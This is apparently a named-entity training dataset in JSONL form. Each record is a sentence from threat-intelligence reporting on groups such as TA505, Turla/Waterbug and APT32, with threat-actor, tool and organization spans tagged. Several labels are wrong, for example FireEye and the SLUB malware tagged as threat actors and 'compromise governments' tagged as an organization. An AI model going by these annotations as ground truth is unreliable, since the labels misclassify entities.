{"text": "In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards .", "spans": {"THREAT_ACTOR: Scattered Canary": [[91, 107]]}, "info": {"id": "dnrti_train_003492", "source": "dnrti_train"}}
{"text": "Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies .", "spans": {"THREAT_ACTOR: Scattered Canary": [[59, 75]], "ORGANIZATION: state government agencies": [[126, 151]]}, "info": {"id": "dnrti_train_003494", "source": "dnrti_train"}}
{"text": "In total , 35 actors have been tied to Scattered Canary’s operations since the group emerged in 2008 .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[39, 57]]}, "info": {"id": "dnrti_train_003495", "source": "dnrti_train"}}
{"text": "Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own .", "spans": {"THREAT_ACTOR: actors": [[29, 35]], "TOOL: scripts": [[48, 55]], "TOOL: templates": [[60, 69]]}, "info": {"id": "dnrti_train_003496", "source": "dnrti_train"}}
{"text": "When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.” These formats are templated text documents that can contain several layers of phishing messages to send to potential victims .", "spans": {"THREAT_ACTOR: Scattered Canary": [[36, 52]]}, "info": {"id": "dnrti_train_003497", "source": "dnrti_train"}}
{"text": "If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today’s most pernicious email scams , this report demonstrates that a much more holistic approach—one based on threat actor identity rather than type of fraudulent activity—is required to detect email fraud and protect organizations .", "spans": {"THREAT_ACTOR: Scattered Canary": [[3, 19]]}, "info": {"id": "dnrti_train_003499", "source": "dnrti_train"}}
{"text": "It used GitHub and Slack as tools for communication between the malware and its controller .", "spans": {"THREAT_ACTOR: It": [[0, 2]], "TOOL: GitHub": [[8, 14]], "TOOL: Slack": [[19, 24]]}, "info": {"id": "dnrti_train_003506", "source": "dnrti_train"}}
{"text": "On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website .", "spans": {"ORGANIZATION: we": [[12, 14]], "THREAT_ACTOR: SLUB": [[43, 47]]}, "info": {"id": "dnrti_train_003507", "source": "dnrti_train"}}
{"text": "Since we published out last report on SLUB , the backdoor has been updated and several improvements were implemented .", "spans": {"ORGANIZATION: we": [[6, 8]], "THREAT_ACTOR: SLUB": [[38, 42]], "TOOL: backdoor": [[49, 57]]}, "info": {"id": "dnrti_train_003509", "source": "dnrti_train"}}
{"text": "During this attack , we found that the SLUB malware used two Slack teams sales-yww9809” and marketing-pwx7789 .", "spans": {"THREAT_ACTOR: SLUB": [[39, 43]]}, "info": {"id": "dnrti_train_003511", "source": "dnrti_train"}}
{"text": "SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments .", "spans": {"THREAT_ACTOR: SWEED": [[0, 5]]}, "info": {"id": "dnrti_train_003512", "source": "dnrti_train"}}
{"text": "In April 2018 , SWEED began making use of a previously disclosed Office exploit .", "spans": {"THREAT_ACTOR: SWEED": [[16, 21]]}, "info": {"id": "dnrti_train_003513", "source": "dnrti_train"}}
{"text": "We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea .", "spans": {"THREAT_ACTOR: them": [[9, 13]]}, "info": {"id": "dnrti_train_003515", "source": "dnrti_train"}}
{"text": "TA505 is also using FlowerPippi (Backdoor.Win32.FLOWERPIPPI.A) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "TOOL: FlowerPippi": [[20, 31]], "TOOL: backdoor": [[71, 79]]}, "info": {"id": "dnrti_train_003518", "source": "dnrti_train"}}
{"text": "TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]]}, "info": {"id": "dnrti_train_003519", "source": "dnrti_train"}}
{"text": "It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload .", "spans": {"THREAT_ACTOR: It": [[0, 2]], "TOOL: FlawedAmmyy payload": [[74, 93]]}, "info": {"id": "dnrti_train_003520", "source": "dnrti_train"}}
{"text": "TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "TOOL: Wizard (.wiz) files": [[11, 30]], "TOOL: FlawedAmmyy RAT": [[55, 70]]}, "info": {"id": "dnrti_train_003521", "source": "dnrti_train"}}
{"text": "On June 14 , we saw TA505’s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet .", "spans": {"THREAT_ACTOR: TA505’s": [[20, 27]], "TOOL: Amadey botnet": [[158, 171]]}, "info": {"id": "dnrti_train_003522", "source": "dnrti_train"}}
{"text": "It later delivered an information stealer named EmailStealer , ” which stolesimple mail transfer protocol (SMTP) credentials and email addresses in the victim’s machine .", "spans": {"THREAT_ACTOR: It": [[0, 2]], "TOOL: EmailStealer": [[48, 60]]}, "info": {"id": "dnrti_train_003523", "source": "dnrti_train"}}
{"text": "On June 18 , the majority of the campaign’s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note” or Confirmation .", "spans": {}, "info": {"id": "dnrti_train_003524", "source": "dnrti_train"}}
{"text": "This campaign used the abovementioned .html file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey .", "spans": {"TOOL: macro": [[85, 90]], "TOOL: FlawedAmmyy payload": [[97, 116]], "TOOL: Amadey": [[123, 129]]}, "info": {"id": "dnrti_train_003525", "source": "dnrti_train"}}
{"text": "On June 17 , we observed the campaign’s spam emails delivering malware-embedded Excel files directly as an attachment .", "spans": {}, "info": {"id": "dnrti_train_003527", "source": "dnrti_train"}}
{"text": "On June 20 , we spotted the campaign’s spam emails delivering .doc and .xls files .", "spans": {"ORGANIZATION: we": [[13, 15]]}, "info": {"id": "dnrti_train_003528", "source": "dnrti_train"}}
{"text": "After our analysis , we found that Proofpoint reported this malware as AndroMut as well .", "spans": {"ORGANIZATION: we": [[21, 23]], "ORGANIZATION: Proofpoint": [[35, 45]], "THREAT_ACTOR: AndroMut": [[71, 79]]}, "info": {"id": "dnrti_train_003530", "source": "dnrti_train"}}
{"text": "Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi .", "spans": {"THREAT_ACTOR: TA505": [[34, 39]], "TOOL: FlowerPippi": [[143, 154]]}, "info": {"id": "dnrti_train_003532", "source": "dnrti_train"}}
{"text": "The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation .", "spans": {"ORGANIZATION: ZLAB": [[76, 80]], "THREAT_ACTOR: TA505": [[190, 195]]}, "info": {"id": "dnrti_train_003533", "source": "dnrti_train"}}
{"text": "The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 .", "spans": {"THREAT_ACTOR: TA505": [[110, 115]], "ORGANIZATION: high profile companies": [[231, 253]]}, "info": {"id": "dnrti_train_003534", "source": "dnrti_train"}}
{"text": "The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS” software: a legitimate remote administration tool produced by the Russian company TektonIT .", "spans": {"THREAT_ACTOR: TA505": [[61, 66]]}, "info": {"id": "dnrti_train_003535", "source": "dnrti_train"}}
{"text": "The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy Email Stealer” part of their arsenal .", "spans": {"THREAT_ACTOR: TA505": [[4, 9]]}, "info": {"id": "dnrti_train_003536", "source": "dnrti_train"}}
{"text": "In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod .", "spans": {"ORGANIZATION: Kaspersky": [[10, 19]], "THREAT_ACTOR: Turla": [[60, 65]], "TOOL: PowerShell loader": [[66, 83]]}, "info": {"id": "dnrti_train_003538", "source": "dnrti_train"}}
{"text": "Turla is believed to have been operating since at least 2008 , when it successfully breached the US military .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_003539", "source": "dnrti_train"}}
{"text": "This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products .", "spans": {"THREAT_ACTOR: Turla": [[27, 32]], "TOOL: PowerShell": [[42, 52]]}, "info": {"id": "dnrti_train_003540", "source": "dnrti_train"}}
{"text": "However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East .", "spans": {"THREAT_ACTOR: Turla": [[88, 93]]}, "info": {"id": "dnrti_train_003541", "source": "dnrti_train"}}
{"text": "Based on our research , SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans .", "spans": {"THREAT_ACTOR: SWEED": [[24, 29]]}, "info": {"id": "dnrti_train_003543", "source": "dnrti_train"}}
{"text": "It is interesting to note that Turla operators used the free email provider GMX again , as in the Outlook Backdoor and in LightNeuron .", "spans": {"THREAT_ACTOR: Turla": [[31, 36]], "TOOL: Outlook Backdoor": [[98, 114]], "TOOL: LightNeuron": [[122, 133]]}, "info": {"id": "dnrti_train_003544", "source": "dnrti_train"}}
{"text": "This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion .", "spans": {"THREAT_ACTOR: Turla": [[59, 64]], "TOOL: frameworks": [[120, 130]]}, "info": {"id": "dnrti_train_003545", "source": "dnrti_train"}}
{"text": "One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 .", "spans": {"THREAT_ACTOR: Crambus": [[113, 120]], "THREAT_ACTOR: OilRig": [[125, 131]], "THREAT_ACTOR: APT34": [[134, 139]]}, "info": {"id": "dnrti_train_003547", "source": "dnrti_train"}}
{"text": "Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose .", "spans": {"THREAT_ACTOR: Waterbug": [[0, 8]], "TOOL: Meterpreter": [[24, 35], [114, 125]]}, "info": {"id": "dnrti_train_003548", "source": "dnrti_train"}}
{"text": "In all likelihood , Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover .", "spans": {"THREAT_ACTOR: Waterbug’s": [[20, 30]], "TOOL: Crambus infrastructure": [[38, 60]]}, "info": {"id": "dnrti_train_003549", "source": "dnrti_train"}}
{"text": "One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network .", "spans": {"THREAT_ACTOR: Waterbug’s": [[58, 68]], "THREAT_ACTOR: Waterbug": [[152, 160]], "THREAT_ACTOR: group": [[222, 227]]}, "info": {"id": "dnrti_train_003550", "source": "dnrti_train"}}
{"text": "These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors .", "spans": {"THREAT_ACTOR: Waterbug": [[19, 27]], "THREAT_ACTOR: group": [[52, 57]], "ORGANIZATION: compromise governments": [[58, 80]], "ORGANIZATION: international organizations": [[85, 112]]}, "info": {"id": "dnrti_train_003551", "source": "dnrti_train"}}
{"text": "Curiously though , Waterbug also compromised other computers on the victim’s network using its own infrastructure .", "spans": {"THREAT_ACTOR: Waterbug": [[19, 27]], "ORGANIZATION: infrastructure": [[99, 113]]}, "info": {"id": "dnrti_train_003552", "source": "dnrti_train"}}
{"text": "Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "TOOL: Mimikatz": [[38, 46]], "THREAT_ACTOR: Waterbug": [[80, 88]]}, "info": {"id": "dnrti_train_003553", "source": "dnrti_train"}}
{"text": "Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 .", "spans": {"TOOL: Mimikatz": [[72, 80]]}, "info": {"id": "dnrti_train_003554", "source": "dnrti_train"}}
{"text": "The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim’s network .", "spans": {"THREAT_ACTOR: Waterbug": [[31, 39]]}, "info": {"id": "dnrti_train_003555", "source": "dnrti_train"}}
{"text": "In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim’s network , with the earliest evidence of activity dating to November 2017 .", "spans": {"THREAT_ACTOR: Crambus": [[62, 69]]}, "info": {"id": "dnrti_train_003556", "source": "dnrti_train"}}
{"text": "Waterbug’s intrusions on the victim’s network continued for much of 2018 .", "spans": {"THREAT_ACTOR: Waterbug’s": [[0, 10]]}, "info": {"id": "dnrti_train_003557", "source": "dnrti_train"}}
{"text": "Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point. also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Waterbug": [[82, 90], [194, 202]], "ORGANIZATION: Crambus infrastructure": [[221, 243]], "TOOL: PsExec tool": [[362, 373]]}, "info": {"id": "dnrti_train_003558", "source": "dnrti_train"}}
{"text": "Waterbug also used an older version of PowerShell , likely to avoid logging .", "spans": {"THREAT_ACTOR: Waterbug": [[0, 8]], "TOOL: PowerShell": [[39, 49]]}, "info": {"id": "dnrti_train_003559", "source": "dnrti_train"}}
{"text": "In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest .", "spans": {"THREAT_ACTOR: Waterbug": [[28, 36]], "TOOL: USB stealer": [[44, 55]]}, "info": {"id": "dnrti_train_003560", "source": "dnrti_train"}}
{"text": "The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary .", "spans": {"ORGANIZATION: DeepSight Managed Adversary": [[4, 31]], "ORGANIZATION: Threat Intelligence": [[36, 55]], "THREAT_ACTOR: Waterbug": [[210, 218]], "ORGANIZATION: group": [[247, 252]]}, "info": {"id": "dnrti_train_003562", "source": "dnrti_train"}}
{"text": "The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary .", "spans": {"ORGANIZATION: DeepSight MATI team": [[4, 23]], "THREAT_ACTOR: Waterbug": [[163, 171]], "THREAT_ACTOR: group": [[200, 205]]}, "info": {"id": "dnrti_train_003563", "source": "dnrti_train"}}
{"text": "While reviewing a 2015 report⁵ of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti⁶ samples designed specifically for Linux⁷ .", "spans": {"THREAT_ACTOR: Winnti": [[36, 42]], "ORGANIZATION: Vietnamese gaming company": [[58, 83]], "THREAT_ACTOR: Winnti⁶": [[119, 126]]}, "info": {"id": "dnrti_train_003564", "source": "dnrti_train"}}
{"text": "Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged .", "spans": {"ORGANIZATION: Chronicle": [[26, 35]], "THREAT_ACTOR: Winnti": [[118, 124]]}, "info": {"id": "dnrti_train_003565", "source": "dnrti_train"}}
{"text": "We will see more from Zebrocy into 2019 on government and military related organizations .", "spans": {"THREAT_ACTOR: Zebrocy": [[22, 29]], "ORGANIZATION: government": [[43, 53]]}, "info": {"id": "dnrti_train_003568", "source": "dnrti_train"}}
{"text": "\bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data .", "spans": {"ORGANIZATION: FBI": [[5, 8]], "THREAT_ACTOR: group": [[49, 54]], "THREAT_ACTOR: APT6": [[61, 65]], "ORGANIZATION: US government": [[78, 91]]}, "info": {"id": "dnrti_train_003571", "source": "dnrti_train"}}
{"text": "\bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 .", "spans": {"ORGANIZATION: \bFireEye iSIGHT": [[0, 15]], "THREAT_ACTOR: APT37": [[43, 48]], "THREAT_ACTOR: Scarcruft": [[99, 108]], "THREAT_ACTOR: Group123": [[113, 121]]}, "info": {"id": "dnrti_train_003572", "source": "dnrti_train"}}
{"text": "\bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"ORGANIZATION: \bTrend Micro": [[0, 12]], "THREAT_ACTOR: MuddyWater": [[41, 51]], "THREAT_ACTOR: actor": [[68, 73]]}, "info": {"id": "dnrti_train_003573", "source": "dnrti_train"}}
{"text": "\bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper .", "spans": {"ORGANIZATION: \bFireEye": [[0, 8]], "THREAT_ACTOR: actors": [[25, 31]], "THREAT_ACTOR: TEMP.Reaper": [[116, 127]]}, "info": {"id": "dnrti_train_003574", "source": "dnrti_train"}}
{"text": "FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: TEMP.Hermit": [[72, 83]]}, "info": {"id": "dnrti_train_003575", "source": "dnrti_train"}}
{"text": "Kaspersky reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: APT33": [[23, 28]], "THREAT_ACTOR: group": [[42, 47]]}, "info": {"id": "dnrti_train_003577", "source": "dnrti_train"}}
{"text": "APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: Kaspersky": [[29, 38]], "TOOL: DROPSHOT dropper": [[60, 76]]}, "info": {"id": "dnrti_train_003578", "source": "dnrti_train"}}
{"text": "The cyber espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 .", "spans": {"THREAT_ACTOR: APT32": [[26, 31], [115, 120]], "TOOL: backdoors": [[57, 66]], "TOOL: scripts": [[71, 78]]}, "info": {"id": "dnrti_train_003579", "source": "dnrti_train"}}
{"text": "In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group .", "spans": {"ORGANIZATION: Mandiant": [[7, 15]], "THREAT_ACTOR: FIN7": [[129, 133]]}, "info": {"id": "dnrti_train_003580", "source": "dnrti_train"}}
{"text": "Kaspersky released a similar report about the same group under the name Carbanak in February 2015 .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: group": [[51, 56]], "THREAT_ACTOR: Carbanak": [[72, 80]]}, "info": {"id": "dnrti_train_003581", "source": "dnrti_train"}}
{"text": "FireEye assesses that APT32 leverages a unique suite of fully-featured malware .", "spans": {"ORGANIZATION: FireEye": [[0, 7]]}, "info": {"id": "dnrti_train_003582", "source": "dnrti_train"}}
{"text": "FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing , consumer products , and hospitality sectors .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[21, 26]], "ORGANIZATION: Vietnam’s manufacturing": [[84, 107]]}, "info": {"id": "dnrti_train_003583", "source": "dnrti_train"}}
{"text": "The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions .", "spans": {"ORGANIZATION: FireEye": [[4, 11]], "ORGANIZATION: iSIGHT": [[12, 18]], "ORGANIZATION: Mandiant": [[115, 123]], "THREAT_ACTOR: APT32": [[142, 147]]}, "info": {"id": "dnrti_train_003584", "source": "dnrti_train"}}
{"text": "FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[22, 27]], "ORGANIZATION: Vietnamese": [[68, 78]], "ORGANIZATION: government": [[79, 89]]}, "info": {"id": "dnrti_train_003585", "source": "dnrti_train"}}
{"text": "In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government .", "spans": {"ORGANIZATION: FireEye": [[23, 30]], "THREAT_ACTOR: APT19": [[65, 70]], "THREAT_ACTOR: group": [[75, 80]], "ORGANIZATION: Chinese government": [[164, 182]]}, "info": {"id": "dnrti_train_003586", "source": "dnrti_train"}}
{"text": "APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "THREAT_ACTOR: FireEye": [[46, 53]]}, "info": {"id": "dnrti_train_003587", "source": "dnrti_train"}}
{"text": "In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers .", "spans": {"ORGANIZATION: FireEye ISIGHT Intelligence": [[35, 62]], "THREAT_ACTOR: APT10": [[76, 81]]}, "info": {"id": "dnrti_train_003588", "source": "dnrti_train"}}
{"text": "FireEye’s visibility into the operations of APT28 – a group we believe the Russian government sponsors – has given us insight into some of the government’s targets , as well as its objectives and the activities designed to further them .", "spans": {"ORGANIZATION: FireEye’s": [[0, 9]], "THREAT_ACTOR: APT28": [[44, 49]], "ORGANIZATION: Russian government": [[75, 93]]}, "info": {"id": "dnrti_train_003589", "source": "dnrti_train"}}
{"text": "FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT28": [[33, 38]]}, "info": {"id": "dnrti_train_003590", "source": "dnrti_train"}}
{"text": "In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group .", "spans": {"ORGANIZATION: FireEye": [[16, 23]], "THREAT_ACTOR: APT30": [[59, 64]]}, "info": {"id": "dnrti_train_003591", "source": "dnrti_train"}}
{"text": "FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers .", "spans": {"ORGANIZATION: FireEye iSIGHT": [[0, 14]], "THREAT_ACTOR: Vendetta Brothers": [[95, 112]]}, "info": {"id": "dnrti_train_003592", "source": "dnrti_train"}}
{"text": "McAfee concludes that some groups—and especially the Poetry Group —have shifted tactics to use Citadel in ways other than what it was originally intended for .", "spans": {"ORGANIZATION: McAfee": [[0, 6]], "THREAT_ACTOR: Group": [[60, 65]]}, "info": {"id": "dnrti_train_003594", "source": "dnrti_train"}}
{"text": "In November 2017 , Talos observed the Group123 , which included a new version of ROKRAT being used in the latest wave of attacks .", "spans": {"ORGANIZATION: Talos": [[19, 24]], "THREAT_ACTOR: Group123": [[38, 46]]}, "info": {"id": "dnrti_train_003596", "source": "dnrti_train"}}
{"text": "In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel .", "spans": {"ORGANIZATION: TALOS": [[15, 20]], "THREAT_ACTOR: DarkHotel": [[101, 110]]}, "info": {"id": "dnrti_train_003597", "source": "dnrti_train"}}
{"text": "ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "TOOL: PowerShell scripts": [[23, 41]], "THREAT_ACTOR: Turla": [[56, 61]]}, "info": {"id": "dnrti_train_003599", "source": "dnrti_train"}}
{"text": "Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government .", "spans": {"ORGANIZATION: Symantec": [[15, 23]], "ORGANIZATION: government": [[96, 106]]}, "info": {"id": "dnrti_train_003601", "source": "dnrti_train"}}
{"text": "Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Waterbug": [[54, 62]]}, "info": {"id": "dnrti_train_003602", "source": "dnrti_train"}}
{"text": "Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor .", "spans": {"ORGANIZATION: Microstep Intelligence Bureau": [[19, 48]], "ORGANIZATION: Ukrainian government": [[100, 120]], "THREAT_ACTOR: Gamaredon": [[148, 157]]}, "info": {"id": "dnrti_train_003603", "source": "dnrti_train"}}
{"text": "Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: SixLittleMonkeys": [[66, 82]], "TOOL: Microcin Trojan": [[114, 129]], "TOOL: RAT": [[136, 139]]}, "info": {"id": "dnrti_train_003604", "source": "dnrti_train"}}
{"text": "Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: BlackTech": [[87, 96]]}, "info": {"id": "dnrti_train_003605", "source": "dnrti_train"}}
{"text": "LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East .", "spans": {"THREAT_ACTOR: LuckyMouse": [[0, 10]], "ORGANIZATION: Palo Alto": [[32, 41]], "TOOL: web shells": [[76, 86]], "ORGANIZATION: government organizations": [[123, 147]]}, "info": {"id": "dnrti_train_003606", "source": "dnrti_train"}}
{"text": "Talos published its analysis of the BlackWater campaign , related to MuddyWater group .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: MuddyWater": [[69, 79]]}, "info": {"id": "dnrti_train_003607", "source": "dnrti_train"}}
{"text": "Regarding other groups , Kaspersky discovered new activity related to ZooPark , a cyber-espionage threat actor that has focused mainly on stealing data from Android devices .", "spans": {"THREAT_ACTOR: groups": [[16, 22]], "ORGANIZATION: Kaspersky": [[25, 34]], "THREAT_ACTOR: ZooPark": [[70, 77]]}, "info": {"id": "dnrti_train_003609", "source": "dnrti_train"}}
{"text": "Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations .", "spans": {"ORGANIZATION: Recorded Future": [[0, 15]], "THREAT_ACTOR: APT33": [[69, 74]]}, "info": {"id": "dnrti_train_003610", "source": "dnrti_train"}}
{"text": "In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor .", "spans": {"ORGANIZATION: Kaspersky": [[23, 32]], "THREAT_ACTOR: ScarCruft": [[42, 51]], "TOOL: ROKRAT": [[153, 159]]}, "info": {"id": "dnrti_train_003612", "source": "dnrti_train"}}
{"text": "The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication .", "spans": {"THREAT_ACTOR: actor": [[11, 16]], "ORGANIZATION: Kaspersky": [[45, 54]], "ORGANIZATION: PLATINUM": [[74, 82]]}, "info": {"id": "dnrti_train_003614", "source": "dnrti_train"}}
{"text": "FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "ORGANIZATION: APT40": [[16, 21]], "THREAT_ACTOR: TEMP.Periscope": [[89, 103]], "THREAT_ACTOR: Leviathan": [[106, 115]], "THREAT_ACTOR: TEMP.Jumper": [[120, 131]]}, "info": {"id": "dnrti_train_003615", "source": "dnrti_train"}}
{"text": "In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets .", "spans": {"ORGANIZATION: Kaspersky": [[13, 22]], "THREAT_ACTOR: PROJECTM": [[86, 94]], "THREAT_ACTOR: MYTHIC LEOPARD": [[99, 113]]}, "info": {"id": "dnrti_train_003616", "source": "dnrti_train"}}
{"text": "OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]], "TOOL: KerrDown": [[87, 95]], "ORGANIZATION: Palo Alto": [[113, 122]]}, "info": {"id": "dnrti_train_003617", "source": "dnrti_train"}}
{"text": "ESET recently uncovered a new addition to OceanLotus’s toolset targeting Mac OS .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: OceanLotus’s": [[42, 54]]}, "info": {"id": "dnrti_train_003618", "source": "dnrti_train"}}
{"text": "In mid-2018 , Kaspersky's report on Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges .", "spans": {"ORGANIZATION: Kaspersky's": [[14, 25]], "THREAT_ACTOR: Lazarus": [[86, 93]]}, "info": {"id": "dnrti_train_003619", "source": "dnrti_train"}}
{"text": "Kaspersky also observed some activity from Gaza Team and MuddyWater .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: MuddyWater": [[57, 67]]}, "info": {"id": "dnrti_train_003620", "source": "dnrti_train"}}
{"text": "Kaspersky wrote about LuckyMouse targeting national data centers in June .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "ORGANIZATION: LuckyMouse": [[22, 32]]}, "info": {"id": "dnrti_train_003621", "source": "dnrti_train"}}
{"text": "Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "ORGANIZATION: LuckyMouse": [[31, 41]]}, "info": {"id": "dnrti_train_003622", "source": "dnrti_train"}}
